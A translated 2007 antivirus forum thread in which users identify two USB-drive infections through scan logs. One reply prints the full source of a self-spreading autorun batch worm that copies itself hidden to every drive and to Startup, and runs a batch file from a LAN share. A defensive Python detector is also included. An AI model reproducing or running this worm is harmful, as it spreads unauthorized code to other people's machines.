What should I do about these two viruses I've caught!! [MD5: 1F3293][MD5: 2F7AD6]

zlq7zj
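Posted on 2007-6-19 23:20:45
Today while selling an MP3 player and downloading songs!!! (I was on eMule at the time, so I had turned avast off) I double-clicked it when I plugged it into the computer, and it didn't occur to me that there was a virus on it. When I opened it I saw there were viruses inside. Experts, what should I do about these two viruses!! Can antivirus software kill them? Can they be cleaned out completely?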

The EQs
Posted on 2007-6-19 23:22:03
Scan performed at: 2007-6-19 23:25:46
Scanning Log
NOD32 version 2338 (20070619) NT
Command line: C:\Documents and Settings\EQ2\桌面\u.rar C:\Documents and Settings\EQ2\桌面\autorun.rar
Operating memory - is OK

Date: 19.6.2007  Time: 23:25:55
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\u.rar; C:\Documents and Settings\EQ2\桌面\autorun.rar
C:\Documents and Settings\EQ2\桌面\u.rar »RAR »u.bat - BAT/Agent.B virus - was a part of the deleted object
C:\Documents and Settings\EQ2\桌面\autorun.rar »RAR »autorun.pif - Win32/Delf.NCV worm - was a part of the deleted object
Number of scanned files: 8
Number of threats found: 2
Number of files cleaned: 2
Time of completion: 23:25:56 Total scanning time: 1 sec (00:00:01)
kp2006
Posted on 2007-6-19 23:23:23
Isn't the OP's name a bit too rogue?

rav

Worm.Antiu.a

Backdoor.RWX.2005.gw

[ Last edited by kp2006 on 2007-6-19 23:25 ]
dyw1021
Posted on 2007-6-19 23:27:37
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\新建文件夹'
C:\Documents and Settings\Administrator\桌面\新建文件夹\autorun.rar
  [0] Archive type: RAR
  --> autorun.pif
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Delf.aws.2 Backdoor server programs
      [INFO]      The file was moved to '46ebf74c.qua'!
C:\Documents and Settings\Administrator\桌面\新建文件夹\u.rar
  [0] Archive type: RAR
  --> u.bat
      [DETECTION] Contains signature of the batch virus BAT/VB.A
      [INFO]      The file was moved to '46e9f706.qua'!
蓝色牛仔裤
Posted on 2007-6-19 23:29:40
What symptoms showed up after the computer got infected? This looks really familiar.

[Scan path] C:\Documents and Settings\Administrator\桌面\u.rar
>C:\Documents and Settings\Administrator\桌面\u.rar\u.bat infected with BAT.Autoruner
>C:\Documents and Settings\Administrator\桌面\u.rar\u.vbe - Ok
>C:\Documents and Settings\Administrator\桌面\u.rar\2007-06-12.sk - Ok
>C:\Documents and Settings\Administrator\桌面\u.rar\AUTORUN.INF - Ok
C:\Documents and Settings\Administrator\桌面\u.rar - archive contains infected objects

[Scan path] C:\Documents and Settings\Administrator\桌面\autorun.rar
>C:\Documents and Settings\Administrator\桌面\autorun.rar\autorun.inf - Ok
>>>C:\Documents and Settings\Administrator\桌面\autorun.rar\autorun.pif infected with BackDoor.Ekai
C:\Documents and Settings\Administrator\桌面\autorun.rar - archive contains infected objects

-----------------------------------------------------------------------------
Scan statistics
-----------------------------------------------------------------------------
Objects scanned: 8
Infected objects found: 2
Objects with modifications found: 0
Suspicious objects found: 0
Adware programs found: 0
Dialer programs found: 0
Joke programs found: 0
Riskware programs found: 0
Hacktool programs found: 0
Objects cured: 0
Objects deleted: 0
Objects renamed: 0
Objects moved: 0
Objects ignored: 0
Scan speed: 276 Kb/s
Scan time: 00:00:01
蓝色牛仔裤
Posted on 2007-6-19 23:31:05
Sure enough, it's this one!!

@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0" (explorer.exe "%~d0")
set v=01
rem Kill-switch file: when it exists, the main loop jumps to :end and uninstalls.
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
rem Not running from the Windows directory: install via :cb, then exit.
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles"
rem Main loop: walk drive letters C..Z and write the script's files to each drive root.
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\uda.a" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
call:ie "%d%\%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%"
:s4
call:copy "uda.a" "%d%"
call:ie %d%\*.sk
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
rem :cb copies the script into the Windows directory and the All Users Startup folder.
:cb
if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%"
call:copy "uda.a" "%systemroot%"
call:ie "%systemroot%\%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
start "" /wait /d "%systemroot%" "%systemroot%\%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
rem English translation of the Chinese message echoed below (comment added in editing):
rem "If you see this, please don't panic. A computer virus is defined by: 1. propagation;
rem 2. latency; 3. destructiveness. By that definition this script fully meets 1, partly
rem meets 2, and does not meet 3 (it is not without destructiveness, but that is aimed only
rem at USB-drive viruses, and files are backed up before deletion, to the bakfiles folder
rem in the Windows directory), so the word virus is in quotes: it is not a real virus.
rem The purpose of this script is to spread via USB drives and clean up the viruses on them
rem along the way; if possible it will send the collected virus files to the author. It will
rem not inconvenience you much (better to be infected by this script than by a USB-drive
rem virus). If you feel it does and want to uninstall this script, create a text file named
rem 8bye in the root of the system drive (no content needed); the uninstall completes in
rem about 20 seconds and helps immunize you against USB-drive viruses. To learn more, open
rem the readme of USB Virus Analysis (readme.txt in the Windows directory). Thank you!"
rem The last two echo lines list the included files (u.bat, uda.a) with sizes and an md5,
rem and say it was made for research-based learning on 2007-03-15, with author and contact.
echo.        看到这个,请不要慌张。电脑病毒的定义为:1、传播性;2、潜伏性;3、破坏性。根据此定义,本脚本这完全符合1,有点符合2,不符合3(若说破坏性也不是没有,但只针对U盘病毒,而且会在删除文件前备份,备份地址:%systemroot%\bakfiles\),因此,病毒二字加了引号,即不是真正的病毒。本脚本的目的是通过U盘传播,并沿途清理U盘中的病毒,如果可能,会把收集到的病毒文件发给作者;不会给您造成太多不便(与其被U盘病毒感染,不如被本脚本感染啦)。如果您觉得这样给您造成了不便,想卸载本脚本,请在%systemdrive%\下新建一个名为8bye的文本文件(不需要写入内容,即:新建%endf%),大约在20秒内完成卸载,并帮助您进行U盘病毒免疫。欲了解更多,请打开 U盘病毒分析 的自述文件(地址:%systemroot%\readme.txt)。谢谢!
echo.        包含文件:u.bat(本文件,4240字节)、uda.a(21674字节,md5:e6762ebf6123bc17ab31995c61bba955)
echo.        为研究性学习而制作,于2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),联系:cyyisgood@126.com
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
rem :inf emits the autorun.inf content written to each drive root.
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
cd /d "%~dp0"
goto :eof
rem :end is the uninstall path: delete the script's files from every drive, then its own files.
:end
set d=!dl:~%n%,1!
echo.%d%:\
if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"

[ Last edited by 蓝色牛仔裤 on 2007-6-19 23:33 ]
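A defender-side check for what the script posted above leaves on a drive, as an added example that is not part of the original thread: it audits an autorun.inf for the launch entries the :inf routine writes and picks the script's marker files out of a drive-root listing. The function names and SAMPLE text are constructed for illustration, and the file names assume the script is saved as u.bat, as in the scan logs.

```python
import re

# Heuristics chosen for this example: launch targets a removable drive's
# autorun.inf has no ordinary reason to use.
SUSPICIOUS = re.compile(
    r"\b(wscript|cscript|cmd)(\.exe)?\b|\.(vbe|vbs|bat|cmd|pif|scr)\b", re.I)
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
# File names taken from the script and scan logs above, assuming the script
# is saved as u.bat; the .sk marker is named after the current date.
ARTIFACT = re.compile(r"^(u\.bat|u\.vbe|uda\.a|\d{4}-\d{2}-\d{2}\.sk)$", re.I)

# Constructed sample: what the :inf routine writes when %~n0 is "u".
SAMPLE = r"""[AutoRun]
open=wscript.exe u.vbe
shell\open\Command=wscript.exe u.vbe
shell\explore\Command=wscript.exe u.vbe
shell\find\Command=wscript.exe u.vbe
"""


def audit_autorun(text):
    """Return (key, value, reason) for risky launch entries under [AutoRun]."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if not LAUNCH_KEY.match(key):
            continue
        if SUSPICIOUS.search(value):
            reason = "launches a script host or script/PIF file"
        elif key.lower().startswith("shell\\"):
            reason = "overrides an Explorer shell verb"
        else:
            continue
        findings.append((key.lower(), value, reason))
    return findings


def worm_artifacts(root_listing):
    """Return the names in a drive-root listing that match the script's files."""
    return sorted(name for name in root_listing if ARTIFACT.match(name))
```

Because the script sets the system, hidden and read-only attributes on its files, the listing passed to worm_artifacts has to come from an enumeration that includes hidden and system files.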
蓝色牛仔裤
Posted on 2007-6-19 23:37:35
Last time my classmate got hit by this, he couldn't open his hard drive and ended up having to format it~
jlennon
Posted on 2007-6-19 23:40:19

Reply to post #7 by 蓝色牛仔裤

The official release of ps 1.40 is coming out soon. How did 1.30 feel to use?
蓝色牛仔裤
Posted on 2007-6-19 23:48:08

Reply to post #8 by jlennon

1.3 feels great; of the HIPS I've used, it's the one that suits me best. I'll definitely give 1.40 a try~
Off to bed.. excuse me~
wangjay1980
Posted on 2007-6-19 23:49:36
deleted: virus Virus.BAT.Agent.b        File: C:\Documents and Settings\Owner\桌面\u.rar/u.bat
deleted: Trojan program Backdoor.Win32.Delf.aws        File: C:\Documents and Settings\Owner\桌面\autorun.rar/autorun.pif//NSPack//NSPack